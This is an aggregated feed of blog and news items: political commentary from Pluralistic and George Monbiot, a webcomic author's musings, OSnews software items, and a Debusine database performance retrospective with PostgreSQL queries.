Biden's pizzaburger compromises made everyone unhappy. He appointed generational talents like Lina Khan, Jonathan Kanter and Rohit Chopra to run key agencies charged with crushing corporate power, and then gave lifetime appointments to corporate-friendly judges who blocked their rulemakings and penalties:

https://www.aljazeera.com/news/2023/7/11/us-judge-turns-down-challenge-to-microsoft-merger-with-activision

Of course, it wasn't just Biden's own judicial appointees who stood in his way; from the Supreme Court on down, on issues from student debt cancellation to noncompetes, judges blocked the Biden administration. When this happened, Biden somehow couldn't find his way to his bully pulpit. Rather than working the refs – the way Trump does, in ways that energize his base, stiffens his legislators' resolve and intimidates other judges – Biden tinkered in the margins to find ways to advance half-measures and stayed mum in public.

This compromise-oriented meekness carried over into Biden's relationship with Democratic lawmakers who sold out the American people. Rather than campaigning for the primary opponents of monsters like Fetterman, Sinema and Manchin, Biden worked behind the scenes to broker compromises, delivering yet another inedible pizzaburger (and acting hurt and bewildered when no one thanked him for it). The alternative? Constitutional hardball:

https://pluralistic.net/2024/10/18/states-rights/#cold-civil-war

It's not clear whether Harris's abbreviated campaign could have made the public case that she would govern in a more muscular fashion as befitted the polycrisis facing the nation, but she didn't even try. A couple Democratic Party insiders of my acquaintance tell me that Biden only agreed to step aside on the condition that Harris not criticize his record. I don't know if that's true, but even within that hypothetical constraint, Harris hardly presented herself as an avatar of change. She carried on Biden's tradition of conspicuously failing to campaign on the significant achievements of Biden's own trustbusters, and put her brother-in-law, the lawyer who helped Uber crush labor rights in California, in charge of her campaign:

https://www.nytimes.com/2024/08/04/us/politics/kamala-harris-tony-west.html

The point of all this is that the American people have, on two occasions, comprehensively rejected the "America is already great"/"Nothing would fundamentally change" politics of a liberal-dominated left/liberal progressive coalition. The senior partners in that coalition have driven the country into a ditch, letting Trump stage a fascist takeover that has us fighting not to win another election, but just to have another one.

Americans are sick of being told that their politicians can't do anything because "they're not the Green Lantern:"

https://pluralistic.net/2023/01/10/the-courage-to-govern/#whos-in-charge

America isn't already great. If we are to have more elections – much less win them – we will need to mobilize millions of people. You don't do that by telling them to oppose Trumpismo – you get them out in the streets by giving them something to support. That was Mamdani's winning message: "I know what a politician can do, and I will do it":

https://pluralistic.net/2026/02/24/mamdani-thought/#public-excellence


Hey look at this (permalink)



A shelf of leatherbound history books with a gilt-stamped series title, 'The World's Famous Events.'

Object permanence (permalink)

#25yrsago Denmark plans to legalize music trading https://edition.cnn.com/2001/TECH/internet/05/07/denmark.downloads.idg/index.html

#20yrsago Babysuit https://web.archive.org/web/20060513013815/https://www.gildlilies.com/pop_ups/phillip_toledano_kaleidoscope.htm

#20yrsago Patent office will ask the public to “peer review” inventions https://web.archive.org/web/20060512051743/http://www.dotank.nyls.edu/communitypatent/

#20yrsago Report from France’s DRM protest at Place de la Bastille https://web.archive.org/web/20170902135411/https://tofz.org/?dir=Paris%2Fevents%2FMarch

#20yrsago Interactive maps show your city’s floodline when the sea rises https://flood.firetree.net/

#20yrsago Scientology to open “Super Power” training center in FL https://web.archive.org/web/20060522112457/http://www.sptimes.com/2006/05/06/Tampabay/Scientology_nearly_re.shtml/
#20yrsago Homemade radios http://www.duntemann.com/radiogallery.htm

#20yrsago Vatican astronomer denounces Creationism as “paganism” https://web.archive.org/web/20060517013332/http://news.scotsman.com/international.cfm?id=674042006

#20yrsago Canada’s New Democratic Party embraces copyfighting musicians https://web.archive.org/web/20060520024734/http://www.ndp.ca/page/3713

#15yrsago Teens and privacy online: using Facebook is compatible with valuing privacy https://www.zephoria.org/thoughts/archives/2011/05/09/how-teens-understand-privacy.html

#15yrsago Ann Arbor library acquires lending, sharing and copying rights to Creative Commons music catalog https://annarborchronicle.com/2011/04/28/ann-arbor-library-signs-digital-music-deal/

#15yrsago Tin robot on Karel Čapek’s grave https://www.gilesorr.com/travels/Prague2011/BestPrague.20110421.6142.GO.CanonSX10.html

#15yrsago Just look at this banana Dalek. https://web.archive.org/web/20110716022131/https://www.daleksoftheday.com/2011/05/banana-dalek.html

#15yrsago NRA and Florida gag pediatricians: no more firearm safety advice for parents https://www.npr.org/2011/05/07/136063523/florida-bill-could-muzzle-doctors-on-gun-safety

#10yrsago Conservative economics: what’s happened to the UK economy after a year of Tory rule https://web.archive.org/web/20160509113126/https://www.independent.co.uk/news/business/news/what-has-happened-to-the-economy-under-the-tories-in-six-charts-a7017131.html

#10yrsago Save iTunes: how the W3C’s argument for web-wide DRM would have killed iTunes https://www.eff.org/deeplinks/2016/04/save-itunes

#10yrsago America’s courts are going dark https://www.justsecurity.org/30920/courts-going-dark/

#10yrsaogo Australian government issues report calling for copyright and patent liberalisation https://www.eff.org/deeplinks/2016/05/australian-productivity-commission-slams-protectionist-copyright-and-patent-laws

#10yrsago Panama Papers: New Zealand is the go-to money launderer for crooked Latin Americans https://www.rnz.co.nz/news/panama-papers/303356/nz-at-heart-of-panama-money-go-round

#10yrsago Safe Patient Project: searchable spreadsheet tells Californians whether their doc is on probation, and why https://web.archive.org/web/20160507002350/http://consumersunion.org/research/california-doctors-on-probation/

#5yrsago The Memex Method https://pluralistic.net/2021/05/09/the-memex-method/

#5yrsago How copyright filters lead to wage-theft https://pluralistic.net/2021/05/08/copyfraud/#beethoven-just-wrote-music

#1yrago Who broke the internet? https://pluralistic.net/2025/05/08/who-broke-the-internet/#bruce-lehman


Upcoming appearances (permalink)

A photo of me onstage, giving a speech, pounding the podium.



A screenshot of me at my desk, doing a livecast.

Recent appearances (permalink)



A grid of my books with Will Stahle covers..

Latest books (permalink)



A cardboard book box with the Macmillan logo.

Upcoming books (permalink)

  • "The Reverse-Centaur's Guide to AI," a short book about being a better AI critic, Farrar, Straus and Giroux, June 2026 (https://us.macmillan.com/books/9780374621568/thereversecentaursguidetolifeafterai/)
  • "Enshittification, Why Everything Suddenly Got Worse and What to Do About It" (the graphic novel), Firstsecond, 2026

  • "The Post-American Internet," a geopolitical sequel of sorts to Enshittification, Farrar, Straus and Giroux, 2027

  • "Unauthorized Bread": a middle-grades graphic novel adapted from my novella about refugees, toasters and DRM, FirstSecond, April 20, 2027

  • "The Memex Method," Farrar, Straus, Giroux, 2027



Colophon (permalink)

Today's top sources:

Currently writing: "The Post-American Internet," a sequel to "Enshittification," about the better world the rest of us get to have now that Trump has torched America. Third draft completed. Submitted to editor.

  • "The Reverse Centaur's Guide to AI," a short book for Farrar, Straus and Giroux about being an effective AI critic. LEGAL REVIEW AND COPYEDIT COMPLETE.
  • "The Post-American Internet," a short book about internet policy in the age of Trumpism. PLANNING.

  • A Little Brother short story about DIY insulin PLANNING


This work – excluding any serialized fiction – is licensed under a Creative Commons Attribution 4.0 license. That means you can use it any way you like, including commercially, provided that you attribute it to me, Cory Doctorow, and include a link to pluralistic.net.

https://creativecommons.org/licenses/by/4.0/

Quotations and images are not included in this license; they are included either under a limitation or exception to copyright, or on the basis of a separate license. Please exercise caution.


How to get Pluralistic:

Blog (no ads, tracking, or data-collection):

Pluralistic.net

Newsletter (no ads, tracking, or data-collection):

https://pluralistic.net/plura-list

Mastodon (no ads, tracking, or data-collection):

https://mamot.fr/@pluralistic

Bluesky (no ads, possible tracking and data-collection):

https://bsky.app/profile/doctorow.pluralistic.net

Medium (no ads, paywalled):

https://doctorow.medium.com/

Tumblr (mass-scale, unrestricted, third-party surveillance and advertising):

https://mostlysignssomeportents.tumblr.com/tagged/pluralistic

"When life gives you SARS, you make sarsaparilla" -Joey "Accordion Guy" DeVilla

READ CAREFULLY: By reading this, you agree, on behalf of your employer, to release me from all obligations and waivers arising from any and all NON-NEGOTIATED agreements, licenses, terms-of-service, shrinkwrap, clickwrap, browsewrap, confidentiality, non-disclosure, non-compete and acceptable use policies ("BOGUS AGREEMENTS") that I have entered into with your employer, its partners, licensors, agents and assigns, in perpetuity, without prejudice to my ongoing rights and privileges. You further represent that you have the authority to release me from any BOGUS AGREEMENTS on behalf of your employer.

ISSN: 3066-764X

11:07

Grrl Power #1459 – Chemical Frenemies? [Grrl Power]

She likes him because he challenges her. And by “likes,” I mean she hasn’t killed him yet for challenging her. Or for being an arrogant ass.

No, the story about the MIT/CERN kid isn’t Deus’s backstory, but it apparently is a not-uncommon arc for child prodigies who grow up surrounded by a bunch of average brain types, then finally settle into some bleeding edge profession, and learn that they’re in the 50th percentile of the intelligencia 1%.

I think exponential intelligence is genuinely incomprehensible, because individuals or groups at one intelligence level really lack the tools to understand a group that’s, for instance, ten times as smart. Of course, “ten times” is impossible for us to really quantify anyway, because “ten times” what? The word “intelligence” is really poorly defined in absolute terms. I mean, if you’re good at math but can’t remember dates and anniversaries, are you smarter than someone who struggles to add 15 and 7, but has an eidetic memory? Or is the world’s best astrophysicist smarter than the world’s best diplomat? One can figure out what dark energy is, the other can save hundreds of millions of lives by preventing wars. How much does emotional intelligence factor in? Without it, we’d have a world of sociopaths. At a certain point, information throughput becomes a limiting factor. Is a once-in-a-generation genius who secludes himself and occasionally publishes some revolutionary mathematical proof “smarter” than The Machine from Person of Interest (which was a show where a massive supercomputer processed every video and phone call and text message, etc, and alerted the Feds to terrorist plots – which sounds terribly dystopian, but the inventor (the glasses guy from Lost) made it a closed system so the government couldn’t use it to spy. The bulk of the episodes revolved around the fact that it could also detect people plotting non-national level crimes like murder, so the inventor put a backdoor in that would spit out a Person of Interest, and they wouldn’t know if it was the perpetrator or the victim. Anyway, I thought it was an entertaining show.) You’d probably say that The Machine in this case wasn’t intelligent at all, but throughout the series, it demonstrated an ability to learn and had a non-human intelligence that allowed it to stay ahead of the evil government agencies and corporations that wanted to abuse its abilities.

The point is, actual capitol-S Super intelligence is one of those things that are on Archon’s short list of Apocalypse level threats, because it’s very likely that the individual with that ability could out plot, plan, and prepare the entirety of the rest of the human race. If Deus built a suit of armor or a rocket powered paraglider and wore a goblin mask so he could rob banks, no one would give a crap about him on the macro level. Instead, he has the resources of a medium-sized-and-growing country and access to alien technology and probably demonic magic. So he’s being watched by a lot of agencies and interests. Some think he might become an exploitable resource, but they’re dumb. I mean, literally, compared to him, they’re very very dumb. Of course, that’s not to say he’s the only super intelligence on Earth. But most of the known ones are more like Digit. Focused on tangible sciences and engineering, not his broader approach to economics, diplomacy and politics.

Obviously Deus has some broad-spectrum approach to resisting chemical influence in place. After all, he’s the leader of an up-and-coming, expanding nation, and seems to be, on the surface, doing a good job for the people under his administration. And he’s making enemies of every surrounding country and eventually he’s going to start hitting countries that third parties have financial interests in. Third parties like diamond oligopolies, mining consortia, all kinds of larger criminal organizations, and eventually, whole countries. Not to mention the Alari colony ship. They’ve agreed to live under his rule, but what that really means is they do whatever they want within their little fiefdom, which amounts to the area they’ve expanded their ship into, plus some extra land they negotiated with Deus, but outside of that, they’re subject to the laws of Galytn. They would immediately assume authority if something “happened” to him. That’s assuming they could keep Thothogoth from using Galytn as a foothold for his own conquest, or that either of them could stand up to the Supers in Deus’s military.

So Deus has some preventative measures and contingencies in place, they’re just not super overt like most comic book Super Smarts do. You know, an army of Deus-bots, or a metal throne room with Kirby-esque pipes and energy fields full of dots that project force fields that can only be deactivated after he delivers a monologue.


Sexy bodymod news lady Gail has a special one-on-one interview with Tournament Quarter finalist Saraviah Nightwing! And if you subscribe to Gail’s Space Patreon, (which, due to the vagaries of Earth and Gal-Net’s DNS servers, happens to be the same as the Grrl Power Patreon, go figure) you can see that same interview in the nude! Well, eventually. The nude part of the interview, as well as the version that includes shading will be coming soon. Of course, you can view the interview in the nude now if you take your own clothes off. You know. Technically. Just put a towel on your chair first.

 


Double res version will be posted over at Patreon. Feel free to contribute as much as you like.

10:35

The shared tragedy of Red Queen hiring [Seth's Blog]

Runaway selection happens when organizations compete with each other far beyond the point where it’s rational to do so. We see this in species as well–peacocks have ungainly and inefficient feather displays because, as Alice’s Red Queen said, “It takes all the running you can do to keep in the same place.”

In organizations, there’s a desire to do good work. Pressure to outdo the others. And a desire for deniability and certainty. Add those up, and we are left with a quest for more long after it’s helpful.

How many people applied for that good job you just posted? 1,000? Spread the word, more applications must be a good thing. It’s not unusual for digitally-amplified hiring processes to see 5,000 applications arrive in a day. 360,000 people applied for a slot in the Goldman Sachs internship program. Would a million have been better?

And then, let’s use AI to pick the 80 best candidates and interview each via Zoom.

Take the ten best and put them through a series of interviews, rotating through each person on the team, including aptitude tests and real-time projects. In many organizations, there are 6, 7 or even 10 rounds of interviews.

It costs a typical organization more than $14,000 to hire an executive, and the time and emotional cost to applicants is many times that. This all leads to lowered productivity, wasted time and a damaged brand.

What do we get in exchange for this investment? Are the people you hire with this exhausting/exhaustive process adding more value than the ones we found with much less time ten years ago?

And the second question: would your third or fourth choice have worked out just as well, if not better?

If Red Queen hiring actually worked, then we’d see that organizations that spend more time on it would outperform those that don’t. It’s pretty clear to me that this isn’t the case–it’s not an investment in the future, it’s a sign of bureaucratic stasis, a quest for deniability, and a thoughtless pursuit of the wrong sort of more. We’ve made it much easier for people to apply for jobs, but done little to improve what happens after the applications arrive.

What if we spent the time wasted on Red Queen maximization doing something useful instead–training and orientation, perhaps. Interview until you find someone who can do the job, then hire them. Then get back to work.

We can’t even ask that question, because it feels like a compromise. Without any data at all, we’ve bought into the Red Queen race that our false proxies, sufficiently polished, deliver better results. In fact, there’s a huge increase in the cost to the applicants and the organization, but no measurable increase in the value created.

Successful fishermen understand that casting an ever-wider net is not always the best way to catch the fish you need.

10:28

Debian embraces reproducible builds [OSnews]

Big news from the Debian release team: Debian is going for reproducible package builds.

Aided by the efforts of the Reproducible Builds project, we’ve decided it’s time to say that Debian must ship reproducible packages. Since yesterday, we have enabled our migration software to block migration of new packages that can’t be reproduced or existing packages (in testing) that regress in reproducibility.

↫ Paul Gevers

Reproducible means, in short, that you can verify that the source code used to build a package is indeed that source code. This provides a layer of defense against people tampering with code or otherwise trying to fiddle with the process between source code and final package on your system. This effort constitutes a tremendous amount of work, but it’s massively important.

“Building a web server in aarch64 assembly to give my life (a lack of) meaning” [OSnews]

ymawky is a small, static http web server written entirely in aarch64 assembly for macos. it uses raw darwin syscalls with no libc wrappers, serves static files, supports GET, HEAD, PUT, OPTIONS, DELETE, byte ranges, directory listing, custom error pages, and tries to be as hardened as possible.

why? why not? the dream of the 80s is alive in ymawky. everybody has nginx. having apache makes you a square. so why not strip every single convenience layer that computer science has given us since 1957? i wanted to understand how a web server actually works, something i know little about coming from a low-level/systems background. the risks that come up, the problems that need to be solved, the things you don’t think about when you’re writing python or c.

this (probably) won’t replace nginx, but it is doing something in the most difficult way possible.

↫ Tony “imtomt”

I love this.

Object oriented programming in Ada [OSnews]

Ada is incredibly well designed. One way this shows is that it takes the big, monolithic features of other languages and breaks them down into their constituent parts, so we can choose which portions of those features we want. The example I often reach for to explain this is object-oriented programming.

↫ Christoffer Stjernlöf

Exactly what it says on the tin.

09:42

Freexian Collaborators: Debusine workflow performance issues (by Colin Watson) [Planet Debian]

During March and April, we had a number of performance issues that made Debusine’s core functions of running work requests and reflecting their results in workflows quite unreliable. Investigating and fixing this took up a lot of time from both the Debusine development team and Freexian’s sysadmins.

The central problems involved a series of database concurrency and worker communication issues that interacted in complex ways. On bad days, this caused between 10% and 25% of processed work requests to fail unnecessarily. We communicated some of the problems to users on IRC, but not consistently since we didn’t entirely understand the scope of the problems at the time.

Most of the problems are fixed now, but we had a retrospective meeting to make sure we understood what happened and that we learn from it. Here’s a summary.

Data model

Debusine’s workflows consist of many individual work requests. Each work request has a database row representing its state, which means that the overall state of a workflow is distributed across many rows. Changes to one work request (for example, when it is completed) can cause changes to other work requests (perhaps unblocking it so that it can be scheduled to an idle worker). Those changes may happen concurrently, and in practice often do.

Workers typically need to create artifacts containing the output of tasks: these include things like packages, build logs, and test output.

Debusine records task history so that it can make better decisions about how to schedule work requests. Since this might otherwise grow without bound, the server expires older parts of that history after a while. The same is true for many other kinds of data.

Causes

  • Because workflows involve changes that propagate between work requests, there were historically some cases where different parts of the system could deadlock due to trying to take update locks on overlapping sets of work request rows in different orders. We mitigated that somewhere around 2025-11-05 by locking entire workflows in one go before making any change that might need to propagate between work requests like this; that dealt with the deadlocks, but it’s quite a heavyweight locking strategy that sometimes caused significant delays.

  • We’ve been working for some time to make Debusine useful to Debian developers, and regression tracking is an important part of that: it lets developers test uploads without being too badly misled by tests in related packages that were already failing before they started. On 2026-03-11 we enabled this by default on debusine.debian.net, after testing it for a while. Although this is useful, it put more load on the system as a whole, often approximately doubling the number of work requests in a given workflow with many additional dependencies between them.

  • Like much of the world, we’re in an arms race with unethical scrapers desperately trying to feed everyone else’s data into LLMs before they run out of money. We saw a substantial uptick here towards the end of March, which meant that we had to temporarily disable regression tracking and to put some other mitigations in front of our web interface.

  • We historically haven’t had systematic internal timeouts. Prompted by ruff, a Google Summer of Code applicant went through and added timeouts in many places, including some calls between the worker and the server. This was fiddly work and the student did a solid job, so I’m not putting them on blast or anything! However, it did mean that some things that came in under load balancer timeouts now timed out earlier on the client side of the request (and hence in Debusine workers), which made some problems show up in different ways and be more obvious. This was deployed on 2026-04-03.

Fixes

Workflow orchestration

Figuring out what individual work requests need to be run as part of a workflow - the process we call “orchestration” - can be challenging. Unlike typical CI pipelines, these workflows often span substantial chunks of a distribution: a glibc update can involve retesting nearly everything! Nevertheless, it’s not particularly helpful for it to take hours just to build the workflow graph.

Fixing this involved many classic database optimizations such as adding indexes and CTEs, but probably the most effective fix was adding a cache for lookups within each orchestrator run or work request. Profiling showed that resolving lookups was a hot spot, and the way that task data is often passed down through a workflow meant that the same lookup could be resolved hundreds or thousands of times in a large workflow.

Expiry

We knew for quite some time that our expiry job took very aggressive locks, effectively blocking most of the rest of the system. This was an early decision to make the expiry logic simpler by allowing it to follow graphs without worrying about concurrent activity, but it clearly couldn’t stay that way forever.

Row locks in PostgreSQL was very helpful in figuring out the correct approach here. Since we’re mainly concerned about the possibility of new foreign key references being created to artifacts we’re considering for expiry, and since that would involve taking FOR KEY SHARE locks on those rows, we can explicitly take FOR UPDATE locks (which conflict with FOR KEY SHARE), and then recompute the set of artifacts to expire with any locked artifacts marked to keep. This was delicate work, but it saved minutes of downtime every day.

Whole-workflow locking

I mentioned earlier that we avoided some deadlock issues by taking locks on entire workflows. To ensure that these locks are effective even against code that isn’t specifically aware of them, this is implemented by using SELECT FOR UPDATE on all the work request rows in the workflow. In some cases the search for which rows to lock itself tripped up the PostgreSQL planner.

Scheduling

We run multiple Celery workers for various purposes. Some of them can do many things in parallel, but in some specific cases (notably the task scheduler) we only ever want a single instance to run at once. Unfortunately a bug in the systemd service meant that the scheduler often ran concurrently anyway! Once we fixed that, the scheduler logs became a lot less confusing.

When Debusine was small, it was reasonable for it to perform scheduling very aggressively, typically as soon as any change occurred to a work request or a worker that might possibly influence it. This doesn’t scale very well, though, and even though we tried to batch multiple scheduling triggers that occurred within a single transaction, it could still make debugging very confusing. We reduced the number of changes that would result in immediate scheduling, and deferred everything else to a regular “tick”.

The scheduler may not be able to assign a work request to an idle worker due to the workflow being locked. That isn’t a major problem in itself; it can just try again later. However, in very large workflows, we found that it often worked its way down all the pending work requests one by one finding that each of them was locked, which was slow and also produced a huge amount of log noise. It now assumes that if a work request is locked, then it might as well skip other work requests in the same workflow until the next scheduler run.

Between them, these changes reduced the number of locks typically being held on debusine.debian.net by about 80%:

Lock graph

Worker refactoring

The Debusine worker has always been partially asynchronous, but while it was actually executing a task - in other words, most of the time, at least in busy periods - it didn’t respond to inbound websocket messages, causing spurious disconnections. We restructured the whole worker to be fully event-based.

We also had to put quite a bit of effort into improving the path by which workers report work request completion, because if that hits a timeout then it can mean throwing away hours of work. We have some further improvements in mind, but for now we defer most of this work to a Celery task so that whole-workflow locks aren’t on the critical path.

Database write volume

One of our sysadmins observed that our database write volume was consistently very high. This was a puzzle, but for a long time we left that unexplored. Eventually we thought to ask PostgreSQL’s own statistics, and we found a surprise:

debusine=> SELECT relname AS table_name,
debusine->        n_tup_ins AS inserts,
debusine->        n_tup_upd AS updates,
debusine->        n_tup_del AS deletes,
debusine->        (n_tup_ins + n_tup_upd + n_tup_del) AS total_dml
debusine-> FROM pg_stat_user_tables
debusine-> WHERE (n_tup_ins + n_tup_upd + n_tup_del) > 0
debusine-> ORDER BY total_dml DESC
debusine-> LIMIT 20;
              table_name              | inserts |  updates   | deletes | total_dml
--------------------------------------+---------+------------+---------+------------
 db_collectionitem                    | 1418251 | 3578202388 | 3630143 | 3583250782
 db_token                             |   15143 |   11212106 |   11389 |   11238638
 db_workrequest                       |  386196 |    6399071 | 1820500 |    8605767
 db_fileinartifact                    | 2783021 |    1837929 | 1663887 |    6284837
 django_celery_results_taskresult     | 1819301 |    1501623 | 1791656 |    5112580
 db_artifact                          |  960077 |    3340859 |  663890 |    4964826
 db_collectionitemmatchconstraint     | 1550457 |          0 | 2207486 |    3757943
 db_artifactrelation                  | 2229382 |          0 | 1363825 |    3593207
 db_fileupload                        | 1023400 |    1057036 | 1023346 |    3103782
 db_file                              | 1673194 |          0 |  970252 |    2643446
 db_fileinstore                       | 1411995 |          0 |  970259 |    2382254
 db_filestore                         |       0 |    2381578 |       0 |    2381578
 django_session                       |  645423 |    1519880 |     531 |    2165834
 db_workrequest_dependencies          |  365877 |          0 |  936537 |    1302414
 db_worker                            |   18317 |     949280 |    9487 |     977084
 db_collection                        |   10061 |         85 |  177741 |     187887
 db_workerpooltaskexecutionstatistics |   28721 |          0 |       0 |      28721
 db_workerpoolstatistics              |    1640 |          0 |       0 |       1640
 db_workflowtemplate                  |     130 |        158 |     649 |        937
 db_identity                          |      76 |        661 |       0 |        737
(20 rows)

Oh my - that’s a lot of db_collectionitem updates and must surely be out of proportion with what we really need. Can we narrow that down by asking about the most recently-updated tuples?

debusine=> SELECT DISTINCT category
debusine-> FROM db_collectionitem
debusine-> WHERE id IN (
debusine->     SELECT id FROM db_collectionitem
debusine->     ORDER BY xmin::text::integer DESC LIMIT 10000
debusine-> );
           category
------------------------------
 debusine:historical-task-run
(1 row)

That might not be absolutely reliable, but it was certainly a hint. As per PostgreSQL’s documentation, by default UPDATE always performs physical updates to every matching row regardless of whether the data has changed, and our code to expire old task history entries wasn’t doing that properly. Once we knew where to look, it was easy to add some extra constraints.

This reduced our mean write volume on debusine.debian.net from about 23 MB/s to about 3 MB/s, which had an immediate knock-on effect on our request failure rate:

Disk write graph

HTTP errors

Current state

Our metrics indicate that things are a lot better now. We still have a few things to deal with, such as:

  • Some more performance fixes are on their way to fix some remaining cases where views are very slow or where file uploads from workers fail due to locks.
  • We have some changes in the works to revamp how work request changes propagate through workflows in a way that doesn’t require so many heavyweight locks.
  • We have a number of monitoring and alerting improvements we’d like to make, both for outcomes (things like slow Celery tasks) and possible root causes (database performance). We’d also like to deploy some more modern observability tools; hunting for things using journalctl isn’t terrible, but it’s not really the state of the art.
  • We need to improve how we communicate to users when we’re having operational problems, both informally (IRC, etc.) and on the site.
  • Retries don’t always behave the way you’d expect in workflows.

I hope this has been an interesting tour through the sorts of things that can go wrong in this kind of distributed system!

08:49

In Bloom [Penny Arcade]

New Comic: In Bloom

06:56

Hear This [George Monbiot]

Radical Listening could transform our politics and block the rise of the far right.

By George Monbiot, published in the Guardian 7th May 2026

Most people have made up their minds, and nothing you can say will change them: that’s the credo of parties such as Labour and the Democrats. Don’t challenge voters on the doorstep. Use focus groups to find out what they want, and give it to them. Follow, don’t lead. But all that’s on them, not us.

It’s true that conventional attempts at persuasion fail. A meta-analysis and original experiments by the political scientists Joshua Kalla and David Broockman found that “the best estimate of the effects of campaign contact and advertising” in US general elections “is zero”. But this says nothing about voters and everything about the useless approach of the parties trying to reach them.

Further work by the same scientists along with other people’s studies show that persuasive methods do exist. They don’t change everyone’s minds, but they can make enough difference to win elections and build a kinder, fairer, greener country. These techniques are known as “deep canvassing”.

Deep canvassing works only if you have a large army of volunteers, ideally from the community you’re trying to reach. Instead of delivering a message then scuttling away, as conventional canvassers do, their role is to connect and listen. Across conversations that might last for 10 or 20 minutes, they let people discuss their feelings. Then, without arguing or judging, they share their own experiences and ask questions (“have you ever been treated unfairly?”) that might reveal common ground.

The technique was developed by LGBT activists in Los Angeles after same-sex marriage rights were not voted into law in a state referendum. They wanted to find out why and to see whether people could change their minds. They were amazed by the response, and asked researchers to study the technique. The effects turned out to be significant.

Not only is deep canvassing persuasive but, by contrast to almost all other approaches, the change appears to be durable, at least over the course of months. It seems to have been a decisive factor in the election of Zohran Mamdani as mayor of New York.

What makes the difference is the listening. There’s a solid rule in life: if you don’t listen to other people, they won’t listen to you. I’m often told that people are “too exhausted” to engage in politics. That can mean they’re overwhelmed by work and family life. But it can also refer to the exhaustion of being unheard. The sense that no one is listening is alienating and demoralising.

Another benefit is that deep canvassing allows people to change their minds without losing face. A study in the journal Political Communication found that when someone is heard attentively and without judgment, “they are more likely to become more open-minded and process information in a less defensive manner”. Active listening creates “a sense of shared social identity”, which can build “faith in wider democratic processes”.

All this is compelling enough, but there may be an even more effective means of connection (though it awaits quantification). I’ve been following the work of a remarkable group in my own constituency, South Devon, called Common Ground. It’s not attached to any party, but seeks to prevent the far right from gaining power, to counteract division and create what it calls “a longing for kindness”. Its annual budget is under £400. Instead of going to people’s doors, the volunteers set up a board in a busy street and begin by asking people to put stickers on a chart.

That’s another solid rule in life: people love stickers. On the board are questions designed to provoke conversation on issues such as the NHS, climate, the voting system, immigration, social media, Brexit, public services and polarisation, and boxes in which you can agree or disagree by adding a sticker.

The board is handwritten. Anthea Simmons, the driving force behind Common Ground, tells me this provides a reason to read out the questions to people who may be illiterate without embarrassing them. It’s also a way of starting a conversation. Then the volunteers ask people why they’ve made their choices. They listen attentively, occasionally saying something that connects their experiences, or gently correcting disinformation. It might be quick, it might go on for half an hour.

I’ve watched them at work in two places with high levels of deprivation and social crisis: Paignton and Brixham. These are prime targets for Reform UK, as alienation can easily be channelled into fury at immigrants and other out-groups.

In both places, a small crowd quickly formed around the board and people began chatting to each other as well as the volunteers. “Climate?” one person said. “It’s not affecting us very much yet.” Another replied: “My allotment disagrees. It’s a swamp.”

What leapt out immediately was that most respondents were far to the left of their own voting intentions. The distribution of their stickers suggested a very strong commitment to the NHS, action on climate, compassion, tolerance and an end to billionaire power. But many of the same people have voted or intend to vote for Reform, which would deliver the opposite. This discovery seemed to be equally startling to the participants.

Another thing I witnessed, especially when interviewing people just after these conversations, was a sense of relief, even exhilaration. People were buzzing. Some hardly seemed to hear my questions, but carried on talking about the issues that bothered them: the lack of NHS dentistry, the state of the harbour, corruption, AI, litter, the care crisis. It was as if a bottle had been uncorked.

Being heard is valuable in its own right. Loneliness and alienation, as well as being the feedstock of fascism, are major causes of human misery. The volunteers have been told by some people that it’s the only conversation they’ve had all week. Their overwhelming conclusion? People do care about the lives of others, even when influencers and algorithms push them towards hate and fear.

It wouldn’t be quite right to call this deep canvassing. The volunteers don’t have a script and they’re engaging across a range of issues rather than focusing on one. Perhaps it could be called “radical listening”. To judge by what I witnessed, they seem to have found a way of tearing down the walls dividing us. Do this everywhere, and who knows? We could have a very different country.

www.monbiot.com

06:07

Girl Genius for Monday, May 11, 2026 [Girl Genius]

The Girl Genius comic for Monday, May 11, 2026 has been posted.

01:14

Link [Scripting News]

I have to say something about the Knicks, who just blew out the Sixers in a sweep, 4 games to zero. They've never played this well. They are more than a deep team of great athletes, they are highly intelligent people and they're all really working together. Right now, it feels like a sure thing that they'll breeze through the next round and face off OKC or San Antonio in the finals, and that will be something. But I know that's not the right way to look at it. The next series is going to be with a team that feels the title is theirs as much as the Knicks do. I've been with the Knicks through the worst of times that never seemed to end. And now for something completely different.

[1297] How to Wake Your Tiger [Twokinds]

Comic for May 10, 2026

01:07

Kernel prepatch 7.1-rc3 [LWN.net]

Linus has released 7.1-rc3 for testing. "I think this answers the 'is 7.1 continuing the larger size pattern that we saw with 7.0?' question, and the answer is yes: that wasn't a fluke brought on by a .0 release - it simply seems to be the new normal."

Sculpt OS 26.04 released [OSnews]

Sculpt OS, the operating system based on the various components that make up Genode, has seen a new release, 26.04. A lot of the new features and changes to Genode that we’ve been talking about for a while now are part of this release, most notably the new human-inclined data syntax that replaces XML as the configuration language for Genode. That’s not the only major improvement, though.

Regarding technical advances of the new version and device support in particular, all Linux-based drivers have been updated to kernel version 6.18, making the system compatible with most modern Intel-PC hardware. Laptop users may appreciate the new USB networking option that is now offered by default.

Software-wise, the new version comes with a longed-after update of Qt6 along with the Chromium-based Falkon browser, downloadable at the depot of cproc. In the same menu, one can find the experimental first version of the Goa SDK running natively on Sculpt OS without the need of a Linux VM. For the first time, Genode components can now be developed, compiled, and tested using Sculpt OS on its own. The amazement of walking without crutches.

↫ Sculpt OS 26.04 release notes

This new release is available for common PC hardware, the PinePhone, and the MNT Reform. 

00:21

Sprite scaling on the Master System: building the new on the ruins of the old [OSnews]

Sprite scaling. It is the coolest effect of the 2D arcade era, a must-have for games from Space Harrier to Real Bout Fatal Fury Special. Home consoles pretty much lacked it– sorry, Nintendo, but Mode 7 only scales a background, not sprites. So therefore you might be surprised to hear that Sega’s plucky underdog Master System could do it. Well, don’t get your hopes up; this is far too limited– calling it scaling is overstating things. But let’s dig in anyway!

↫ Nicole Branagan

Nicole Branagan has the best articles on obscure console features, and this one is no exception.

Sunday, 10 May

18:28

Link [Scripting News]

Leaflet is a nice editor designed to work with Bluesky. But they've been branching out. They now support email and RSS output. They're going in the right direction, toward the internet with the email, and toward the web with the RSS support. As nice as Bluesky is, it's a small part of the web, and it isn't as open as it might appear to be, imho.

16:49

57 [Whatever]

